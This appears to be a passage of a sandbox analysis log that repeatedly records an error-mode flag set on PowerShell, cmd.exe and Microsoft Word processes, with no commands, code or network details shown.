Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX

